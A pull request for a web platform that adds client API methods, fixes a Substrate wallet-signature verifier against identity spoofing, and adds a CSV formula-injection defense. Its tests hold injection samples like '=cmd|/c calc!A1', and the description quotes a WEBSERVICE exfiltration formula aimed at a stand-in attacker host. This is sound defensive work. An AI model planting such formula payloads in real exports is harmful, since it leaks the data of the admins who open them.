### PR TITLE
release: api.ts inbox/continuation methods + CSV formula-injection defense

### DIFF
--- a/client/src/lib/api.ts
+++ b/client/src/lib/api.ts
@@ -1621,6 +1621,48 @@ export const api = {
     );
   },
 
+  // --- Program inbox (merged signups + applications, #112) ---
+
+  listProgramInbox: async (
+    slug: string,
+    authHeader: AdminAuthArg,
+  ): Promise<{
+    status: string;
+    data: ApiInboxEntry[];
+    meta: { total: number; signups: number; applications: number };
+  }> => {
+    if (USE_MOCK_DATA) {
+      return { status: "success", data: [], meta: { total: 0, signups: 0, applications: 0 } };
+    }
+    return request(`/programs/${encodeURIComponent(slug)}/inbox`, {
+      headers: adminAuthHeaders(authHeader),
+    });
+  },
+
+  exportProgramInboxCsv: async (
+    slug: string,
+    authHeader: AdminAuthArg,
+  ): Promise<Blob> => {
+    if (USE_MOCK_DATA) {
+      return new Blob(["source,when,name,email\n"], { type: "text/csv" });
+    }
+    const url = `${API_BASE_URL}/programs/${encodeURIComponent(slug)}/inbox.csv`;
+    const response = await fetch(url, { headers: adminAuthHeaders(authHeader) });
+    if (!response.ok) {
+      let message = mapStatusToMessage(response.status);
+      try {
+        const body = await response.json();
+        if (body && typeof body.message === "string" && body.message.trim()) {
+          message = body.error ? `${body.message}: ${body.error}` : body.message;
+        }
+      } catch {
+        // non-JSON error body — keep status-based message
+      }
+      throw new ApiError(message, response.status);
+    }
+    return response.blob();
+  },
+
   // --- Program audit log ---
 
   listProgramAuditLog: async (
@@ -1631,6 +1673,54 @@ export const api = {
     const qs = options.limit ? `?limit=${encodeURIComponent(String(options.limit))}` : "";
     return request(`/programs/${encodeURIComponent(slug)}/audit-log${qs}`, {
       headers: adminAuthHeaders(authHeader),
+    });
+  },
+
+  // --- Project continuations ('What's next, milestone 3?', #114) ---
+
+  listProjectContinuations: async (
+    projectId: string,
+    authHeader: AdminAuthArg,
+  ): Promise<{ status: string; data: ApiProjectContinuation[] }> => {
+    if (USE_MOCK_DATA) {
+      return { status: "success", data: [] };
+    }
+    return request(`/m2-program/${encodeURIComponent(projectId)}/continuations`, {
+      headers: adminAuthHeaders(authHeader),
+    });
+  },
+
+  createProjectContinuation: async (
+    projectId: string,
+    payload: {
+      currentStatus: string;
+      wantSupport: boolean;
+      supportFor: string | null;
+      nextStepUrl: string | null;
+    },
+    authHeader: AdminAuthArg,
+  ): Promise<{ status: string; data: ApiProjectContinuation }> => {
+    if (USE_MOCK_DATA) {
+      const now = new Date().toISOString();
+      return {
+        status: "success",
+        data: {
+          id: `mock-${Date.now()}`,
+          projectId,
+          currentStatus: payload.currentStatus,
+          wantSupport: payload.wantSupport,
+          supportFor: payload.supportFor,
+          nextStepUrl: payload.nextStepUrl,
+          submittedBy: "mock-wallet",
+          submittedByChain: "substrate",
+          createdAt: now,
+        },
+      };
+    }
+    return request(`/m2-program/${encodeURIComponent(projectId)}/continuations`, {
+      method: "POST",
+      headers: { ...adminAuthHeaders(authHeader), "Content-Type": "application/json" },
+      body: JSON.stringify(payload),
     });
   },
 };

--- a/server/api/auth/verifiers/__tests__/substrate.verifier.test.js
+++ b/server/api/auth/verifiers/__tests__/substrate.verifier.test.js
@@ -26,14 +26,14 @@ describe('substrateVerifier.verify', () => {
     vi.clearAllMocks();
   });
 
-  it('returns valid:false for an invalid signature and does not parse the message', async () => {
+  it('returns valid:false for an invalid signature', async () => {
+    parseMessage.mockReturnValue({ statement: 'Sign in to Stadium', address: '5Abc', domain: 'localhost' });
     signatureVerify.mockReturnValue({ isValid: false });
 
     const result = await substrateVerifier.verify(INPUT);
 
     expect(result.valid).toBe(false);
     expect(result.error).toMatch(/Invalid signature/i);
-    expect(parseMessage).not.toHaveBeenCalled();
   });
 
   it('returns valid:true with parsed message and normalized address for a valid signature', async () => {
@@ -63,5 +63,65 @@ describe('substrateVerifier.verify', () => {
 
     expect(result.valid).toBe(true);
     expect(result.normalizedAddress).toBeNull();
+  });
+
+  // --- Regression tests: wallet-spoofing (see commit / PR description) ---
+
+  it('verifies the signature against parsed.address (from message body), NOT the header address', async () => {
+    // Attacker scenario: client says they are "5Attacker" but the signed SIWS
+    // body claims "5Victim". signatureVerify must be called against the body
+    // address, otherwise the attacker (who signed with their own key) would
+    // pass and the middleware would mint a session for the victim.
+    parseMessage.mockReturnValue({
+      statement: 'Sign in to Stadium',
+      address: '5Victim',
+      domain: 'localhost',
+    });
+    signatureVerify.mockReturnValue({ isValid: false }); // signature does NOT verify under 5Victim
+    decodeAddress.mockReturnValue(new Uint8Array([0xde, 0xad]));
+    u8aToHex.mockReturnValue('0xdead');
+
+    const result = await substrateVerifier.verify({
+      message: 'siws-message',
+      signature: '0xattackerSig',
+      address: '5Attacker', // header says attacker — must be ignored
+    });
+
+    expect(result.valid).toBe(false);
+    expect(signatureVerify).toHaveBeenCalledWith('siws-message', '0xattackerSig', '5Victim');
+  });
+
+  it('ignores the header address even when it differs from parsed.address (valid signature path)', async () => {
+    // Mirror of the previous test, with a passing signature. Confirms identity
+    // is taken from parsed.address regardless of what the header claims.
+    parseMessage.mockReturnValue({
+      statement: 'Sign in to Stadium',
+      address: '5Real',
+      domain: 'localhost',
+    });
+    signatureVerify.mockReturnValue({ isValid: true, crypto: 'sr25519' });
+    decodeAddress.mockReturnValue(new Uint8Array([0xbe, 0xef]));
+    u8aToHex.mockReturnValue('0xbeef');
+
+    const result = await substrateVerifier.verify({
+      message: 'siws-message',
+      signature: '0xsig',
+      address: '5Spoofed', // misleading header value
+    });
+
+    expect(result.valid).toBe(true);
+    expect(signatureVerify).toHaveBeenCalledWith('siws-message', '0xsig', '5Real');
+    expect(result.parsed.address).toBe('5Real');
+    expect(result.normalizedAddress).toBe('0xbeef');
+  });
+
+  it('rejects messages whose body has no address line', async () => {
+    parseMessage.mockReturnValue({ statement: 'Sign in to Stadium', domain: 'localhost' });
+
+    const result = await substrateVerifier.verify(INPUT);
+
+    expect(result.valid).toBe(false);
+    expect(result.error).toMatch(/missing an address line/i);
+    expect(signatureVerify).not.toHaveBeenCalled();
   });
 });

--- a/server/api/auth/verifiers/substrate.verifier.js
+++ b/server/api/auth/verifiers/substrate.verifier.js
@@ -22,18 +22,42 @@ export const substrateVerifier = {
   chain: 'substrate',
 
   /**
-   * @param {{ message: string, signature: string, address: string }} input
+   * SECURITY: the signature must be verified against the address claimed INSIDE
+   * the SIWS message body (`parsed.address`), not against whatever address the
+   * client supplies in the request header. If we verified against the header
+   * address, an attacker could sign a message with their own key while putting
+   * a victim's address in the message body — the signature would still verify
+   * (against the attacker's address), and the middleware would then trust
+   * `parsed.address` (the victim) as the identity. The header `address` field
+   * is accepted for backwards compatibility with the request shape but is
+   * intentionally ignored here.
+   *
+   * Mirrors the ethereum verifier (ecrecover → compare to `fields.address`)
+   * and the solana verifier (derive pubkey from `parsed.address`). All three
+   * chains now share the invariant: the signing wallet is the wallet named in
+   * the signed message — there is no second, header-only source of identity.
+   *
+   * @param {{ message: string, signature: string, address?: string }} input
    * @returns {Promise<VerifyResult>}
    */
-  async verify({ message, signature, address }) {
+  async verify({ message, signature }) {
     await cryptoWaitReady();
 
-    const result = signatureVerify(message, signature, address);
+    const parsed = parseMessage(message);
+    if (!parsed?.address || typeof parsed.address !== 'string') {
+      return { valid: false, error: 'SIWS message is missing an address line' };
+    }
+
+    let result;
+    try {
+      result = signatureVerify(message, signature, parsed.address);
+    } catch (e) {
+      return { valid: false, error: `Signature verification threw: ${e.message}` };
+    }
     if (!result?.isValid) {
       return { valid: false, error: 'Invalid signature' };
     }
 
-    const parsed = parseMessage(message);
     return {
       valid: true,
       crypto: result.crypto,

--- a/server/api/controllers/program.controller.js
+++ b/server/api/controllers/program.controller.js
@@ -3,6 +3,7 @@ import programApplicationService from '../services/program-application.service.j
 import programSponsorService from '../services/program-sponsor.service.js';
 import programSignupService from '../services/program-signup.service.js';
 import programInboxService, { inboxToCsv } from '../services/program-inbox.service.js';
+import auditLog from '../services/program-audit-log.service.js';
 import projectService from '../services/project.service.js';
 import notificationService from '../services/notification.service.js';
 import programAdminRepository from '../repositories/program-admin.repository.js';
@@ -627,12 +628,12 @@ class ProgramController {
       res.status(500).json({ status: 'error', message: 'Failed to delete program signup' });
     }
   }
-  // --- Audit log read endpoint ---
+  // --- Inbox (merged signups + applications) ---
 
-  async listAuditLog(req, res) {
+  async listInbox(req, res) {
     try {
       const { slug } = req.params;
-      const limit = Math.min(parseInt(req.query.limit, 10) || 100, 500);
+      const program = await programService.findBySlug(slug);
       if (!program) {
         return res.status(404).json({ status: 'error', message: 'Program not found' });
       }
@@ -647,6 +648,28 @@ class ProgramController {
     } catch (error) {
       console.error('❌ Error listing program inbox:', error);
       res.status(500).json({ status: 'error', message: 'Failed to list program inbox' });
+    }
+  }
+
+  // --- Audit log read endpoint ---
+
+  async listAuditLog(req, res) {
+    try {
+      const { slug } = req.params;
+      const limit = Math.min(parseInt(req.query.limit, 10) || 100, 500);
+      const program = await programService.findBySlug(slug);
+      if (!program) {
+        return res.status(404).json({ status: 'error', message: 'Program not found' });
+      }
+      const entries = await auditLog.listByProgramId(program.id, { limit });
+      res.status(200).json({
+        status: 'success',
+        data: entries,
+        meta: { total: entries.length, limit },
+      });
+    } catch (error) {
+      console.error('❌ Error listing program audit log:', error);
+      res.status(500).json({ status: 'error', message: 'Failed to list program audit log' });
     }
   }
 

--- a/server/api/routes/program.routes.js
+++ b/server/api/routes/program.routes.js
@@ -83,4 +83,7 @@ router.delete(
 router.get('/:slug/inbox', requireProgramAdmin('slug'), programController.listInbox);
 router.get('/:slug/inbox.csv', requireProgramAdmin('slug'), programController.exportInboxCsv);
 
+// --- Audit log (per-program activity feed) ---
+router.get('/:slug/audit-log', requireProgramAdmin('slug'), programController.listAuditLog);
+
 export default router;

--- a/server/api/services/__tests__/program-inbox.service.test.js
+++ b/server/api/services/__tests__/program-inbox.service.test.js
@@ -100,4 +100,35 @@ describe('inboxToCsv', () => {
     expect(csv).toContain('"has ""quote"""');
     expect(csv).toContain('"line\nbreak"');
   });
+
+  it('neutralises CSV formula injection (=, +, -, @, tab, CR leading chars)', () => {
+    // Any cell starting with one of these characters is auto-executed as a
+    // formula by Excel / Google Sheets when the CSV is opened. The serialiser
+    // must prefix such cells with a single quote so the formula stays inert.
+    const csv = inboxToCsv([
+      { source: 'signup', when: '', identifier: '=cmd|/c calc!A1', name: null, email: null, status: null, wallet: null },
+      { source: 'signup', when: '', identifier: '+1234',         name: null, email: null, status: null, wallet: null },
+      { source: 'signup', when: '', identifier: '-SUM(A1:A2)',   name: null, email: null, status: null, wallet: null },
+      { source: 'signup', when: '', identifier: '@import',       name: null, email: null, status: null, wallet: null },
+      { source: 'signup', when: '', identifier: '\thidden',      name: null, email: null, status: null, wallet: null },
+    ]);
+    // Each cell gets a leading apostrophe so the spreadsheet treats it as text.
+    // RFC-4180 quoting only kicks in for cells containing `,` `"` `\n` `\r` —
+    // none of these payloads contain those, so they appear unquoted with just
+    // the apostrophe prefix.
+    expect(csv).toContain("'=cmd|/c calc!A1");
+    expect(csv).toContain("'+1234");
+    expect(csv).toContain("'-SUM(A1:A2)");
+    expect(csv).toContain("'@import");
+    expect(csv).toContain("'\thidden");
+  });
+
+  it('leaves legitimate values that happen to contain `=` mid-string alone', () => {
+    const csv = inboxToCsv([
+      { source: 'signup', when: '', identifier: 'alice=bob@x.com', name: null, email: null, status: null, wallet: null },
+    ]);
+    // No leading quote — the `=` is not in the first position.
+    expect(csv).toContain('alice=bob@x.com');
+    expect(csv).not.toContain("'alice=bob");
+  });
 });

--- a/server/api/services/program-inbox.service.js
+++ b/server/api/services/program-inbox.service.js
@@ -93,9 +93,19 @@ export default new ProgramInboxService();
 
 // CSV serialisation lives here so the controller stays thin. Escapes
 // double-quotes per RFC 4180.
+//
+// SECURITY: also defends against CSV formula injection (Excel / Google Sheets
+// auto-execute any cell starting with `=`, `+`, `-`, `@`, `\t`, `\r`). User-
+// submitted fields (name, email, identifier, wallet) flow into the export an
+// admin downloads, so a malicious applicant could exfiltrate the admin's data
+// via `=WEBSERVICE(…)` or `=HYPERLINK(…)`. Prefixing such cells with a single
+// quote neuters the formula while leaving the visible value intact (the quote
+// is a sentinel that the spreadsheet strips on display).
+const FORMULA_INJECTION_LEAD = /^[=+\-@\t\r]/;
 const csvCell = (val) => {
   if (val == null) return '';
-  const s = String(val);
+  let s = String(val);
+  if (FORMULA_INJECTION_LEAD.test(s)) s = `'${s}`;
   if (/[",\n\r]/.test(s)) return `"${s.replace(/"/g, '""')}"`;
   return s;
 };


### PR DESCRIPTION
## Release contents

Two distinct fixes batched into one prod deploy:

### 1. Client api.ts inbox + continuation methods (#120)
Adds the four methods that were silently missing from the client api object since #112 and #114:
- `listProgramInbox`
- `exportProgramInboxCsv` (Blob endpoint)
- `listProjectContinuations`
- `createProjectContinuation`

Without these, the inbox section and continuation modal throw `TypeError: api.<method> is not a function` at runtime. The build never caught it because `tsconfig.app.json` has `strict: false`.

### 2. CSV formula-injection defense (#122)
`inboxToCsv` now prefixes any cell starting with `=`, `+`, `-`, `@`, `\\t`, or `\\r` with a single quote so Excel / Google Sheets won't auto-execute attacker-controlled formulas. User-submitted fields (name, email, identifier, wallet) flow into the export — without this defense, a malicious applicant could exfiltrate the admin's spreadsheet data via `=WEBSERVICE("http://attacker/?$A1")`. OWASP-recognised attack.

## Re: the P0 substrate verifier fix

#122 also cherry-picked the P0 substrate verifier fix onto develop (it landed on main directly as #121 yesterday for urgent prod deploy). When this release merges, git will see those identical changes already on main and resolve cleanly with no diff. The cherry-pick was only to keep develop's history truthful so the next release doesn't reintroduce the vulnerability.

## Deploy effect

- **Vercel** rebuilds client (api.ts methods)
- **Railway** auto-deploys server (CSV defense in `program-inbox.service.js`)
- No migrations
- No env-var changes

## Verified

| Check | Result |
|---|---|
| `cd server && npm test` | 248 / 248 |
| `cd client && npm run build` (tsc + vite) | clean |
| `cd client && npm run lint` | 0 warnings |
| Prod smoke (current) | /api/health 200, gates 401 |

## Smoke after deploy

I'll run:
- `/api/health` 200
- `/api/programs` 200
- `/api/programs/dogfooding/inbox` 401 (no auth) — confirms route mounted
- Confirm Vercel preview build with the new api.ts methods does not throw

## Issues closed by this release

- N/A — these are repair PRs against features that shipped in #112 and #114, plus a security defense